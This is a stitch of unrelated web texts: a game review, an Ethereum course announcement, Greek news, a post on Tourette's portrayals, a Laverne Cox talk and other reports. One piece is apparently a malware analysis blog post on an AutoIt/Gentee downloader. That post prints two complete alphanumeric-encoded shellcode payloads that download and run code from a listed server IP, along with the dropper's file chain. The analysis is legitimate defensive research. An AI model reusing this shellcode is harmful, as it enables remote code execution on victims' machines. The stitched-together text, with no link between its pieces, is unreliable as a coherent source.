Once you have discovered the optimal path through a level, as well as the most efficient way to fight each boss nightmare, NiGHTS becomes a score attack game. Mastering a level is all about hitting targets consecutively in order to build up a large score. Defeating a boss as quickly as possible grants you a score multiplier, which serves as a final bonus. Leaderboard integration makes it easy to see how your skills stack up to others.
Oddly, the new version of NiGHTS doesn't appear to have the two-player versus mode that was present in the Saturn version. Instead, it has some of the limited-edition Christmas NiGHTS content.
Christmas NiGHTS is well known among Saturn fans as a demo disc that is more collectible than the original game. Produced as a special edition and then given away as a magazine cover mount, Christmas NiGHTS included a single world from the full game. During most of the year, it played like a typical demo, but during the Christmas holiday, the game would automatically change to a corresponding theme. Graphics, music, characters — everything got a makeover.
The main Christmas NiGHTS demo level is available as an unlockable here, though the Sonic variant appears to be missing in action. The Saturn version allowed you to play through the demo level as SEGA's famous blue hedgehog. It also reskinned one of the bosses to look like Sonic's traditional nemesis, Doctor Robotnik.
In the end, the XBLA port of NiGHTS is basically a poor man's version of the original. While it's technically the same game, the lack of proper analog control makes the HD version a historical curiosity rather than a must-play experience. If you have the means, track down a Saturn copy along with the analog controller. You'll be glad you did.
Score: 5.5/10
Learn Smart Contracts in 8 weeks with Ethereum Stream Course
Ethereum is attracting a lot of aspiring and experienced developers who want to explore blockchain technology and smart contracts. Interested parties may want to check out the eight-week Ethereum developer course by Exosphere, called Ethereum Stream.
Also read: Coinimal launches MasterCard and Visa payments
The Ethereum Stream Course at Exosphere
Although eight weeks might sound a bit short to learn everything about the inner workings of Ethereum, Exosphere is well-versed in providing complete educational programs. In fact, the Exosphere Academy has been making media headlines these past few months, as they focus on collaboration through discovery to stimulate future innovation.
The Ethereum Stream project has been created through a partnership between ConsenSys and Ethereum Labs. Anyone who has an interest in getting a hands-on approach with blockchain technology and smart contracts can apply for this course through the Exosphere website. As one would come to expect from such an eight-week trajectory, there will be plenty to learn and explore.
Exosphere Academy's very own Moritz Bierling will act as the Stream Curator throughout this course, and he will be joined by Exosphere Fellow Philip Saunders. Some people may recognize that name as Saunders is the founder and CEO of Pax, a civic network and peer-to-peer legal system built on top of the Ethereum protocol.
Saunders, who will mentor the Ethereum Stream participants, stated:
I'm delighted to join the Exosphere team and help break
ground in exciting new areas. What makes learning Ethereum at Exosphere unique is being among people who are just as driven and committed as you are, who will support you and challenge you to be your best self.
The primary objective of the Ethereum Stream course is getting developers acquainted with Solidity, the smart contract scripting language used by the Ethereum protocol. Moreover, attendees will be encouraged to build their own decentralized apps, or contribute to one of the many existing projects in existence today.
Obtaining Recognition for Developmental Work
But that is not all, as all of the contributions made during this course will be formally recognized, which can be seen as a “bonus” for future resumes. Thanks to the help of Ethereum Labs, projects in need of some assistance will be able to reach out to the team, and have their particular problems submitted to Exosphere Academy students.
Exosphere's Moritz Bierling told Bitcoin.com:
I'm very happy about our partnership with ConsenSys and Ethereum Labs. Thanks to their support our students will be able to work on existing projects in the Ethereum ecosystem and gain the real-world development experience necessary to become a valuable asset to future employers or build their own projects.
Moreover, ConsenSys will create special badges to credit specific contributions made by attendees. This should, in turn, serve as a tool to help secure future internships at companies exploring the boundaries of blockchain technology and smart contracts. Applying for the Ethereum Stream course can be done through the Exosphere website, but keep in mind this course will start on July 11, 2016. Time is of the essence, and there is only a limited number of available spots.
What are your thoughts on Ethereum Stream and the Exosphere Academy program? Let us know in the comments below!
Source: Medium
Images courtesy of Exosphere, Ethereum, Shutterstock
Farewell
Thursday March 05, 2015
It is with great mixed emotion to announce that RISE will be closing for good at the end of April 2015. As many of you know, our lease expired several years ago and we have been open since on borrowed time.
It's been an amazing run of over 16 years which is rare in the club business and even rarer for a club that never served a drop of alcohol. I would like to personally thank and mention Alan Pottak who not only helped finance the RISE sound system when we ran out of money in the beginning, but also installed, maintained, tuned and repaired it over the years keeping it as good as new to this day.
It wasn't easy in the least, but Myself, Darrin, Mike and the entire RISE staff are very proud of what we delivered each week. As for Mike Swells, without him, RISE would have closed a few years ago when Darrin and I moved to Brooklyn. Mike is the reason it kept going and he deserves a big thank you from all.
With that said, we have an amazing 2 months of closing parties planned which begin this very weekend. Part 1 of those parties are in March and Part 2 are in April (announced soon). I know I speak for the entire RISE staff (past and present) when I say how much we all appreciate each and every one of you who come and dance and socialize in the wee hours of the night in the sleepy town called Boston.
Image copyright EPA Image caption Alexis Tsipras: "The people must decide free of any blackmail"
Greece's prime minister has called a referendum on 5 July for voters to decide whether to accept a bailout deal offered by international creditors.
Alexis Tsipras made clear he was against the "unbearable" bailout plan.
Parliament is debating whether to ratify the vote, and some queues have been seen outside banks in Athens.
Eurozone finance ministers are meeting to discuss the crisis, and to decide whether to give Greece an extension of the bailout until after the vote.
The current bailout expires on Tuesday, the same day Greece's IMF debt is due.
It is unclear what would happen if Greece does not get a temporary extension. Without a deal on the bailout, there are fears Greece's economy could collapse.
Image copyright AFP Image caption Some queues were reported outside banks in Athens
The head of Mr Tsipras's coalition partners, Panos Kammenos, called for calm amid reports that worried Greeks had begun queuing outside banks to take out their money. Many fear that Greece's central bank might start restricting withdrawals.
In a televised address, Mr Tsipras described the bailout plan as "humiliation" and condemned "unbearable" austerity measures demanded by creditors.
Analysis: Chris Morris, BBC News, Brussels
The government portrays the referendum as yes or no to austerity. The opposition says it is, in effect, yes or no to Europe. Some of them say the referendum itself is unconstitutional, and are urging the Greek president to reject it.
But Mr Tsipras will argue that he had no other option. He was elected to get a better deal rather than no deal at all. But no better deal was on offer.
As for Greece's creditors I think they will be one part flabbergasted, one part anxious, and one part wondering what on earth they do next.
But several eurozone finance ministers, arriving in Brussels for their fifth meeting on Greece in little more than a week, said there was no question of accepting Mr Tsipras's request to extend his country's current international bailout by a few days, to prevent the Greek economy collapsing before a referendum can be held.
Some of the ministers will now want to focus on Plan B instead - how to ring-fence Greece and protect the rest of the eurozone from any potential economic shocks ahead.
"I call on you to decide - with sovereignty and dignity as Greek history demands - whether we should accept the extortionate ultimatum that calls for strict and humiliating austerity without end, and without the prospect of ever standing on our own two feet, socially and financially," he said.
"The people must decide free of any blackmail," he added.
Greek Finance Minister Yanis Varoufakis tweeted in support of the referendum.
Some opposition figures on the other hand accused Mr Tsipras of using the vote to push Greece out of the EU.
A senior centre-left politician in Germany's coalition government, Carsten Schneider, called for the European Central Bank (ECB) to stop propping up Greece's economy with emergency injections amounting to $89bn.
BBC economics editor Robert Peston said that if the ECB continued its emergency support, some members of its governing council feared it would be breaking all central banking rules.
Media playback is unsupported on your device Media caption James Reynolds reports from Andros in Greece: ''The island worries that tourists will be put off by price rises and walk away for good''
Mr Tsipras was speaking hours after talks in Brussels, where the IMF and EU offered a five-month extension to Greece's bailout programme.
The proposal would have released €15.5bn of funding, €1.8bn of which would have been available immediately. However, that was conditional on Greece carrying out reforms.
German Chancellor Angela Merkel had urged Athens to accept what she called an "extraordinarily generous" offer.
Greek debt talks - main sticking points
Media playback is unsupported on your device Media caption Greece's debt dilemma explained in 75 seconds
Greece has refused to accept cuts to pension payments or public sector wages
The IMF is pushing for deeper spending cuts, not just more tax rises
A key point of friction is a special benefit paid to some low-income pensioners, which creditors want scrapped
Creditors also want a wider VAT base; Greece says it will not allow extra VAT on medicines or electricity bills, and has also resisted calls for VAT hikes on hotels and restaurants
Athens wants a concrete commitment to debt relief, something its creditors are not offering
What if the Greek talks fail
Can Greece stay in the euro?
Chris Morris: Tsipras may face impossible choice
How did Greece get in this mess?
The protracted negotiations are stalled over what reforms Athens is prepared to take, with disputes emerging on pensions and increasing Value Added Tax.
If Greece does default, it could exit the eurozone, with possible repercussions for the rest of Europe and the world economy.
Only once agreement is reached will the European Commission, European Central Bank (ECB) and International Monetary Fund (IMF) unlock the final €7.2bn tranche of bailout funds for cash-strapped Greece.
Greece has been in recession for much of the past six years. After winning elections in January, Mr Tsipras' left-wing Syriza party promised to end tough austerity measures.
Syriza says tough bailout conditions have impoverished Greece, fuelling unemployment - currently at more than 20% - and failing to reduce the massive debt pile.
The Portrayal of Tourette's Disorder in the Media
This post is part of a series of guest posts on GPS by the graduate students in my Psychopathology course. As part of their work for the course, each student had to demonstrate mastery of the skill of “Educating the Public about Mental Health.” To that end, each student has to prepare three 1,000ish word posts on a particular class of mental disorders, with one of those focusing on changes made from the DSM-IV to the DSM-5.
______________________________________________
The Portrayal of Tourette's Disorder in the Media by Tyler Whitehead
In the modern world, the media acts as an important informant for everything going on in the world, educating the mass public about anything and everything possible. Although it is one of the largest providers of information on mental health to the layperson, I don't think it is any big stretch that the media often does not do a good job with the portrayal of such. There is an abundance of stigma placed on mental illness in most societies, even without media misportrayals of such problems adding to these stigmas. Mental illness appears in the media for a variety of reasons (see, for example, Dr. Lack's documentary series Case Studies in Abnormal Psychology). But, unlike depression or schizophrenia, Tourette's Syndrome typically appears for one reason – comedic relief.
Tourette's Syndrome (TS) is the most serious of the Tic Disorders, in which the individual has both motor and vocal tics, although not necessarily concurrent to each other. Tics are involuntary, sudden, and repetitive muscle contractions, which may result in observable movements or audible vocal expression. The tics must be present for more than a year and the individual must be under the age of 18 when the tics begin. Frequently, the onset of the tics begin between ages four and six and worsen around age ten to twelve. It is uncommon for the tics to persist into adulthood, but if they do they usually do not worsen or stay consistently severe. Developmentally, the disorder may start as a simple motor or a vocal tic, that worsens into more complex tics. There are diverse types of tics, but the most commonly known (and shown in the media) tic is coprolalia, which is the expression of socially inappropriate or obscene words or phrases. But, despite being commonly associated with TS, only 6%-10% of those with Tourette's exhibit coprolalia. Given that TS itself only affects about 3-8 in every 1,000 people, this is a very tiny percentage of the population.
But, however small the number of people with coprolalia symptoms may be, various outlets of media depict most people who have TS with only this (very rare) symptom, most likely because it provides a great shock value or laugh. One of the most widely seen portrayals came in the (pretty terrible) movie Deuce Bigalow:
http://youtu.be/fFn0llYqM8w
Tourette's Disorder has also been portrayed in television shows, movies, literature, stand-up comedy shows, video games, radio, web comics, and even professional wrestling (see here for an exhaustive list). Even rapper and noted psychologist Kayne West diagnosed himself with “little baby Tourette's” because he speaks whatever happens to pop into his head. Nevermind the fact that there is no such thing as “little baby Tourette's,” but this disorder, which is in fact, very real, has become the ultimate excuse for acting like a complete jerk and/or saying what ever the person feels like right at that moment, consequences be damned. This characterization is shown time and time again in the media. Now, I am not actually suggesting that anyone truly believes Kayne West has some version of Tourette's. That would be silly! I am suggesting though, that instead of accurately representing those with Tourette's, the media goes for the laugh, at the expense of a group of people. I am also suggesting that a more accurate illustration would possibly serve to increase understanding and offer a platform for education concerning the disorder.
Unlike those who depict the disorder in a false manner, people diagnosed with Tourette's often experience premonitory urges. These urges are a bodily sensation that precedes the tic, which notifies the individual that they are about to tic. The urges can be used so the individual can eventually learn to suppress the tic for a time; however, the suppression can only last for a small time, perhaps long enough for the person to remove himself or herself from his or her current situation and go somewhere else more private. The tics are expressed as a quick, bark-like verbalization that provides the individual with a sensation of relief once released. Another dissimilarity between the media and those with the disorder is that the tics are unwanted. The tics are not directed at anyone in particular and just happen despite the person meaning or wanting to say what they are saying (or doing). The tics seem to be exacerbated in certain situations, particularly those that are anxiety provoking, and are lessened when the individual is more focused on a specific task, such as school work.. For the individual with TS, the tics are not an excuse to be mean or act offensively, simply expressing whatever happens to come to the person's mind. It is a part of the individual's life that has real consequences and complications, which can affect his or her academic, social, and work life.
This is not to say that all instances of media illustrate Tourette's in an irresponsible manner. There are a few occasions when an individual with tics have been represented in the media in a positive way. Two of the most positive are the classic I have Tourette's, But Tourette's Doesn't Have Me and the more recent film Front of the Class. Works like these that highlight TS to demonstrate the true nature of the disorder and the challenges that those with the disorder face from day to day are sorely needed. These challenges can manifest in the individual having difficulties obtaining and keeping employment, inability to participate in an academic setting, or facing obstacles in everyday circumstances that involve social, public settings. Simply being able to see these situations unfold allows the viewer a better understanding of the disorder and those who have the disorder. This understanding will then lead to more compassion and empathy for those with the disorder. It will become something they have, not who they are. For example, the use of those with Down Syndrome in television shows and movies has produced more responsible characterizations of those with Intellectual Disabilities (ID), has created more awareness, opportunity for education, and positive perspectives of those who do have such disabilities. The same could be done for those with any number of disorders, but especially for those with Tourette's.
Dropper
inct.com
aqq1.com
Symantec.com
Figure 3: Symantec.com sourcecode
jqs.com
184.82.19.103
Figure 2: Call to shellcode
Figure 3: Alphanumeric encoded shellcode
This will be a quick analysis of a Downloader I recently came across (thanks to Artem for providing the sample!). What makes this malware special is the uncommon programming language which it uses to accomplish its tasks (actually a scripting language). The malware itself is very rudimentary, only the actual Downloader (spawns a shellcode) is a bit more advanced. Unfortunately the server isn't responding to the requests from the Downloader, so it is unclear what final purpose this malware has. I think the scripting languages and the shellcode were chosen to evade AV (heuristic) detections. The detection rates of the Dropper are still very low (6/46), even 2 years after its creation:I haven't uploaded the dropped files, but I guess detections rates are also very low if at all. This task is left to the reader. ;-)- Makes use of Gentee scripting language (actually uses CreateInstall, which was coded in Gentee)- Makes use of AutoIt scripting language - Spawns a shell to download additional component(s)A dynamic analysis of this malware can be found at malwr.com:I try to give some additional information, so let's start with the Dropper.All files of this malware have the extension ".com", but they are all .exe files (just renamed to .com).Sample: sample.exeSize: 785.742 BytesTimestamp: 31.01.2011 17:44:13MD5: DBABCE375DE619916E727D24679C6BD3SHA1: D8C7EF587EAB81C1BBC79AA695F5F7FF319F0484The sample can be downloaded at kernelmode.info: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2445 The Dropper was created with CreateInstall tool ( www.createinstall.com ) and consists of multiple files. CreateInstall itself is written in Gentee programming language, which is actually a scripting language. Gentee programs can be bundled into standalone .exe files and are interpreted at runtime by the Gentee Interpreter (genteert.dll and guig.dll). The Dropper creates the following files and folders in the Windows Temp folder:- ...Temp\genteert.dll- ...Temp\genteeXX.tmp (XX stands for random Hexbytes)- ...Temp\genteeXX\guig.dll- ...Temp\genteeXX\setup_temp.gea- ...Temp\Symantec\aqq1.com- ...Temp\Symantec\faktura_scan535624.jpg- ...Temp\Symantec\inct.comThereafter the file inct.com is executed and the following files are deleted again:- ...Temp\genteeXX\guig.dll- ...Temp\genteeXX\setup_temp.gea- ...Temp\genteeXX.tmp- ...Temp\genteert.dllThis file is a compiled AutoIt script, which by default is packed with UPX. After unpacking it, we can load the executable into an AutoIt decompiler (e.g. www.exe2aut.com ) to see that this file just shows the picture "faktura_scan535624.jpg" (see above) and runs the file "aqq1.com" (see above). The picture shows a polish bill of sale from the product from the website fakturki.pl This file was (also) created with CreateInstall and drops the following files and folders into Windows Temp and Autostart folder:- ...Temp\genteert.dll- ...Temp\genteeXX.tmp- ...Temp\genteeXX\guig.dll- ...Temp\genteeXX\setup_temp.gea- ...Temp\Symantec\jqs.com- ...\Autostart\Symantec.comThen it runs the file "Symantec.com" and deletes the following files and folders:- ...Temp\genteeXX\guig.dll- ...Temp\genteeXX\setup_temp.gea- ...Temp\genteeXX\- ...Temp\genteeXX.tmp- ...Temp\genteert.dllThis is another AutoIt script compiled into a standalone .exe file. It starts the dropped file "jqs.com" with one of the following two parameters (alphanumeric shellcodes, encoded with alpha2 - see http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2 ):PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIkLkXmYC0uPWpu0ni8e4qjrbDNkRrTpLKf2dLLKF25DLKBRDh4OX7SzevTqIovQIPNLgLCQCL7r6LGPo18OFm5Qjg8bL0CbRwNkPRfpLKrbElC1jpnkg0qhNeiPt4aZGqXPpPLKPHB8NkBx10faKcYsGLaYLKfTLKwqKf6QyoEaYPnLKqzo4MVaO7p8m0qeJTvc1mIhUkqm4dSEyrChnkrxGTc1HSpfnkVl2klKshwlwqJsLK34NkGqzpmYW44d5tckaKsQ3ipZv19oKP681OPZnkdRhkk6SmaxpnU5SDs0rH3GbI2NRI2trHRlD7dfwwKOhUVQYoF7F7CgqGsZ3064phvZaFpyY7ioyEJKcoQKTqHIRqPQ3Z332qf1CXoK31s05Pv3V0cX0WNioo9VIoJuxk78SivQyBcbu830drY0LDcbv2qB0Qbr60rHXkBu6NGKyo8ULIkv0jdPCk58K0GCePWpNi9p1zWtpPPj7o1FcXt5qVOnk69ozuEaYof7RwpWf7V6bHtmdFuHsKioN5ouYPpugjRkqdVpJK9EZKSyxhLsIoKOkO6O3tPn1DRv5P30e8zPoEORCfyojucZw03XePdP7p5PSXEPS0705PrwPhSh94f3kUkOIEmCV3RsK9IwF7rHC07P5P5PF3aFu8b2LVOyhb9o9EoukpadJmLKC7UQO3lEo0BUxerxiSjH61IoIoio5atxudTn6XVRfNVQGIFNea6PgCs0AAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHK9C0c0c03Pk9IuP18Rpdnkv2dpNkcb6lnkrrR4NkcBthFoMgszDfeaiodqo0LlGLsQsLVbfLwPIQHOvm5Qo7jBhpRrbwnkf2DPlKqR7LvaN0NkG0CHOu9PrTaZ5QHPpPnk1X7hnk1H10C1N3xc7L3ylKgDLKEQN6tq9ouaIPllZaHOfmUQKwVXiprUZTuScMYh7KQmQ40um22xlKBxFD5QYCe6nkvlbkNk2x7lFaJsNkfdlK31jpMYctutfDQKCkU1f9rzsaKOM0v8so2zlKB2ZKlF3mBHRNQurTePCXt7CYBNqyV42HRlcGfFs7kOhU01iov7Rwf7bwRJuPv4QxwJaFqimwyoXUHkRkckuahIpQ0Q1z5Sv12qSX2peP5P5PaCv0PhcgNiOoZfioN5xkdtqI6QhRf2E8WpTBa0nd3b0Rf2pQF2PPe8ZKcedngKiojumY9VPjTP3kUaIoV7CgV7cgaFBHFMs6eHSKioXUNekpSEGjBkSDfp8kM9xk1YM8XGkOkOioDoPNPi5gPnWpGpe88pX5mrPVIoHU2JQPph7pTPwpwp585Pc0cps0QGU8rxOTqCkUYoxUNssc0SmYiwPWbHc010wpC0V3pV58Frz6K9kRIoXUOuiPPtJmLKdGvajcNekpD5herxYSm82EyoYoioTqGHFTdnGH4rDnUagIvNeatpVSePAAIt first checks if the passed days of the current year reached the number 100. If so, jqs.com with the first shellcode is started and then Symantec.com sleeps for a minute. Then a file named "jar_cache879799398409779005999.tmp" is searched in Temp folder and gets deleted if found. I don't know why this "Java file" is searched and deleted, but it is probably the file that gets downloaded or dropped from the downloaded file. Another possibility is that the malware is launched by a Java Applet or a Java exploit. If this Java file isn't found, jqs.com is started with the second shellcode. Then again it sleeps for a minute, searches for the same "Java file" and deletes it.There are two polish words as function names in the script ("" = "launch" and "" = "cleanup"). Together with the picture (see above), I think the malware's creator is from poland or polish speaking.This file was also packed with UPX. This file launches one of the above shellcodes within a new Thread to connect to server at. It does this by allocating a memory buffer (VirtualAlloc()) and storing the passed parameter (shellcode) into it. Then the pointer of the buffer is passed as lpParameter to the CreateThread() API function. The new Thread uses the pointer to call the shellcode (call eax).The shell dynamically resolves some Windows API functions to call them afterwards. It requests data from the server (InternetReadFile()), to copy it into a buffer (VirtualAlloc()) and passing execution to it. As mentioned at the beginning, the server isn't responding, so it's not possible to get more information of the downloaded data (another file or shellcode).Now I need a Re-Neducation :-)
Figures for 2012 show 154 reported cases of racist violence, including 25 in which victims said perpetrators were police
The number of racially motivated attacks increased in Greece last year, as did the severity of the violence involved, human rights groups have said.
The Racist Violence Recording Network reported 154 cases of racist violence in 2012, including 25 in which the victims said the perpetrators were police. The figures were released a week after more than 30 Bangladeshi workers suffered shotgun wounds on a strawberry farm in southern Greece during a dispute with foremen over back pay.
Kostis Papaioannou, the head of the National Commission for Human Rights, said the number of attacks recorded had increased 20% from the previous year. But, he noted, the true number could be much higher because many victims are afraid to come forward, fearing further mistreatment by authorities or deportation for entering the country illegally.
There have been numerous reports of police, who are at the forefront of a government crackdown on foreigners in the country illegally, mistreating immigrants during routine document checks on the street or during detentions. The police have repeatedly said they investigate all reported cases of mistreatment.
The network, composed of 30 aid and human rights groups, records cases only when it has spoken to the victim themselves.
The 2012 figures show "some very interesting and very worrying tendencies regarding racist violence in Greece", Papaioannou said. "We have both an increase in the numbers of attacks but also – which is really worrying too – we have an escalation in the intensity of this violence."
The incidents have spiralled as Greece's economy has worsened over the past few years. Relying on international rescue loans to remain solvent, the country has imposed deep spending cuts that have sent unemployment soaring to around 27%.
The vast majority of attacks occurred in Athens, mainly in inner city neighbourhoods. Immigrants are often set upon by groups of men wielding metal bars, chains, brass knuckles, broken bottles, knives and wooden clubs. The victims suffer from broken bones, damage to sight and hearing and extensive bruising, the network said.
One fatality was recorded last year – a 31-year-old Egyptian man who died of head injuries 17 days after falling into a coma following a severe beating, the network said.
Reza Golami, the head of an association of Afghans living in Greece, said many migrants have become too afraid to leave their homes.
"There live with fear inside them, whether it's the fear of the police or the fear of racists," he said. "They don't dare leave their homes to buy a loaf of bread. This is not something that affects men alone, but even women and small children. We have witnessed hundreds of such cases."
Authorities have vowed to crack down on hate crimes in the financially struggling country. Greece is main entry point for migrants entering the EU illegally, and there has been a surge in popular support for Golden Dawn, an extreme-right xenophobic party, as the financial crisis has deepened.
The government has set up a special unit within the police to deal with racist crimes – a move the rights groups welcomed but said didn't go far enough.
An hour before the event doors open, students fill the first floor of the Student Union. Lines snake their way across the tile floor and out the doors almost stretching the distance to Griffin Hall. The students chatter and laugh, anxiously awaiting to find their seat in the Student Union Ballroom to see Laverne Cox in the LGBTQ Programs and Services hosted event.
Famous for her role as Sophia Burset in the hit show “Orange Is The New Black”, Cox's achievements reach far beyond the realm of the fictitious prison drama. Not only recognized for her public exposure through acting, Cox is the first transgender woman of color to produce and star in her own television show, “TRANSform Me”. Her outspoken views on transgender rights have put Cox's public lectures in high demand.
“It took several months across several departments to make it happen,” said Bonnie Meyer, Director of LGBTQ Programs and Services.
And for the sake of 660 students, staff, faculty, and individuals from neighboring universities, Cox made her public speaking appearance and the crowd went wild.
Greeted with a standing ovation, Cox made center stage as the cheers and screams reverberated off the ballroom walls.
“I'm so grateful to stand here before you tonight,” said Cox in her opening to the audience. “I am a proud African-American transgender woman.”
Featured on CNN, MSNBC, ABC and NPR, Cox has a full schedule of speaking engagements on the topic of transgender rights. Named one of the Top 50 trans icons by the Huffington Post, the graduate of Marymount Manhattan College visits campuses across the nation sharing her life experiences and her transition.
“I didn't want to grow up and become a man,” said Cox, addressing the audience on her experience with puberty.
Among the stories of being bullied and lifelong bouts with shame, Cox expressed her lowest moments and thoughts of suicide.
“I went to our medicine cabinet and swallowed a bottle of pills then went to sleep and hoped I wouldn't wake back up,” Cox said.
Fortunately, Cox woke up and went on to be one of the top leaders in the front on transgender issues. Throughout her speech, Cox supported her focus with statistics and stories of other transgender individuals' struggles, including the tragic story of Islan Nettles. Nettles was a transgender woman who was beat into a coma after some men who were catcalling her realized she was transgendered. Nettles died five days later.
Melancholy fell over the audience as they sat in silence listening to the story.
“Justice is what love looks like in public,” said Cox, quoting Cornel West, “Love today.”
Cox's message is what inspired Meyer's desire to have the well-known public speaker visit NKU's campus.
“Bonnie came to me in the beginning of September,” said Dr. Jeffrey Waple, Assistant Vice President for Student Engagement and Dean of Students. “The big challenge was making it happen and fitting it into her (Cox) schedule. Fortunately, we were able to find a date that worked.”
NKU students got first dibs on tickets for the show. Many surrounding universities called requesting tickets as well.
“I worked with Bonnie behind the scenes. We could do five or six small events or we could do one big event to talk about inclusion, which is vitally important on a college campus,” Kim Turner, Assistant Vice President for Student Support and Business Operations, said.
The sold out show brought students once again to their feet as Cox reached the closing of her show. The audience cheered and clapped as she left the stage and made her way to an invite-only meet-and-greet after the show.
Among those to attend after the lecture was NKU alumni and LGBTQ supporter advocate, Elizabeth Mayberry.
Mayberry said her favorite moments of the speech were “hearing [Cox] story and hearing her struggle and her discussion of feminism and intersectionality.”
Many students talked about the lecture while waiting in line for a picture with Cox at the meet-and-greet event.
“I loved every moment of it” said sophomore international studies major, Kevin Gabbard. “Kentucky is normally a more conservative area and to see that many people show her so much love before, during and after the speech…it was great.”
Meyer said the influence an event of this magnitude was capable of having on students was the driving force behind all the hard work. Both Waple and Turner couldn't agree more that the event was Meyer's vision.
“She saw this opportunity to be an impact on students,” said Turner.
Many students were aware of the impact after the show.
“Like it was said before, this is a part of history,” said junior Brooklyn Butler, political science major, who was one of the students selected from the audience to ask Cox a question after the closing of the speech.
A handful of others also took part in the Q&A, but numerous more had their hands outstretched. If all the questions were given the time to be answered, the show would have lasted into the late hours of the night.
“I hope students walk away with a greater understanding and importance of being allies to each other across difference,” said Meyer.
The perceptive vibe throughout the ballroom was palpable and the conversation across difference did not stop at the door.
Cox consistently attends speaking events in between filming the third season of Orange Is the New Black. Her next lecture will be at Syracuse University on October 29.
You can learn more about Cox and her endeavors here.
Family planning will cut poverty, say Ethiopia and Rwanda PMs
By Emma Batha
LONDON (AlertNet) - African leaders should increase funding for contraceptive services if they want to reduce poverty and hunger, the prime ministers of Ethiopia and Rwanda said ahead of an international summit on family planning.
Writing in the Lancet medical journal, Rwanda's Pierre Damien Habumuremyi and Ethiopia's Meles Zenawi said improving access to contraception also was vital for bringing down “unacceptably high” maternal mortality rates on the continent.
Major donors have praised Ethiopia and Rwanda for increasing access to family planning through strong political commitment and wise investments in their health systems.
On Wednesday the British government and the Bill and Melinda Gates Foundation will host the London Summit on Family Planning which will launch an initiative to give 120 million more women worldwide access to voluntary family planning methods by 2020.
Habumuremyi and Meles suggested family planning would not only save lives but would slow the rapid growth of Africa's swiftly burgeoning populations. Ethiopia and Rwanda are both predicted to double their populations by 2050.
The two leaders said reducing population growth would in turn help their governments make necessary investments “to reduce poverty and hunger, preserve natural resources, and adapt to the consequences of climate change and environmental degradation”.
Estimates show that more than 40 million women in sub-Saharan Africa alone would like to stop or postpone childbearing, but are not using family planning.
“This is a serious cause for concern and a lost opportunity to bolster our development efforts,” the prime ministers wrote.
KEY TO SUCCESS
Women who start childbearing at an early age and have numerous closely spaced pregnancies are at higher risk of dying in pregnancy.
Giving women the ability to delay, space and limit births is vital for bringing down maternal and infant mortality rates, experts say.
A new study in the Lancet shows that extending access to contraception to women who cannot currently obtain it could reduce maternal deaths by 30 percent.
Better spacing of births could likewise cut infant mortality by 10 percent and early childhood mortality by around 20 percent.
Habumuremyi and Meles said improving access to family planning would also enable women to become more economically active and allow parents to invest more in their children's education. This in turn would contribute to overall national development.
“We believe that improving education and improving access to family planning are not alternatives: they are rather complementary policies that African governments and the international community must pursue,” the leaders wrote.
The two prime ministers said they were committed to prioritising family planning and were proud of the progress that is being made to increase contraceptive use in their countries.
In Rwanda, the percentage of married women using contraception rose from 13 percent in 2000 to 52 percent in 2010. In Ethiopia contraceptive use increased from 8 percent to 29 percent in the same period, they said.
But, they added, 25-35 percent of married women in both countries still did not have proper access to family planning.
The two prime ministers called on other African leaders to increase funding for family planning from national budgets.
They pointed out that improving access to contraception could save governments money spent on health care as fewer mothers would need medical help for pregnancy complications and unsafe abortions and there would be fewer deliveries.
Measures taken by both Ethiopia and Rwanda include:
Introducing programmes to enable people who need contraceptives to access them, irrespective of their ability to pay
Strengthening the ability of their health systems to deliver family planning by, among other things, improving the training of health workers
Extending family planning provision to communities through the direct involvement of community members. This is important for winning the support of men and other family members
Forging strong partnerships with religious and traditional leaders, whose support is valuable for successful family planning programmes
Ensuring family planning is allocated sufficient funding to maintain a steady supply of contraceptives to all parts of their countries
Local Projects
President Obama joined thousands today in marking the 10th anniversary of the September 11 attacks at the World Trade Center site in New York, laying his hands on a bronze memorial engraved with names of victims--a list arranged with the help of an algorithm.
The 2,983 names on 76 bronze panels surround two cascading pools of water where the towers stood, in architect Michael Arad's design "Reflecting Absence." In seemingly random fashion, the panels list those who died on September 11, 2001, as well as in the WTC bombing of February 26, 1993.
But the carefully thought-out memorial reflects the victims' complex web of relationships to one another--professional, social, and accidental. This was accomplished thanks to an algorithm created by data artist Jer Thorp working with New York design firm Local Projects.
Arad rejected arranging the names alphabetically or chronologically. The best way to set the names seemed to be one that wouldn't favor some people over others, so they're arranged according to groups and their relationships with one another.
National September 11 Memorial & Museum
The memorial's planners asked the families of victims for "meaningful adjacencies" showing friendships and other relationships among the victims. The roughly 1,200 responses, combined with formal affiliations and multiple requests per victim, represented an enormous puzzle for planners. Some computer scientists who were consulted said it couldn't be done, according to The New Yorker.
Some obvious group adjacencies, such as for investment bank Cantor Fitzgerald, which lost 658 employees, were complex. Others reflected chance encounters on 9/11 that ended in a shared place of death such as an elevator.
The algorithm, created in the open-source Processing language, first placed the victims in clusters and subclusters of related names according to groups and adjacency requests. They were then arranged according to the place of death, such as the north or south tower, the Pentagon, or United Airlines Flight 93, which crashed in Pennsylvania.
This led to about 99 percent of the requested adjacencies being honored. In addition, the system tackled problems such as name length, spacing between lines and potential interference between letters, and other aesthetic challenges--such as the fact that 12 panels are irregularly shaped. The designers worked with the output to produce the tribute.
"It would be misleading to say that the layout for the final memorial was produced by an algorithm," Thorp writes. "Rather, the underlying framework of the arrangement was solved by the algorithm, and humans used that framework to design the final result."
Finding a name on the memorial is straightforward. There are nine primary groups (including first responders, towers, and flights) divided into two tower pools. Each name has a code consisting of N for North Pool or S for South Pool, as well as a panel number. Names can be quickly located on this site.
The National September 11 Memorial opens Monday.
(Via Scientific American)
Please enable Javascript to watch this video
SALT LAKE CITY -- Paragliders and animal lovers are outraged after a YouTube viral video showing a powered paraglider harassing and kicking an owl in mid-air emerged.
The pilot chases an owl for 7 minutes, kicking the bird repeatedly and gloating about it.
Now, state and federal investigators are taking a closer look at the incident.
“It's animal cruelty,” said Jeff Goin, President of the US Powered Paragliding Association “It just feels bad and gives the sport a bad name.”
Although the man in the video's face is not shown, Goin said he believes he knows the man's identity.
“We all know with almost certainty that that's Dell Schanze,” Goin said. “He has an enormous reputation in this sport of doing things that completely disregard our reputation.”
The Humane Society of Utah also believes Schanze is the man in the video. Super Dell's face isn't shown in the video, but the former computer store owner who's had numerous run ins with the law is also infamous in the paragliding community.
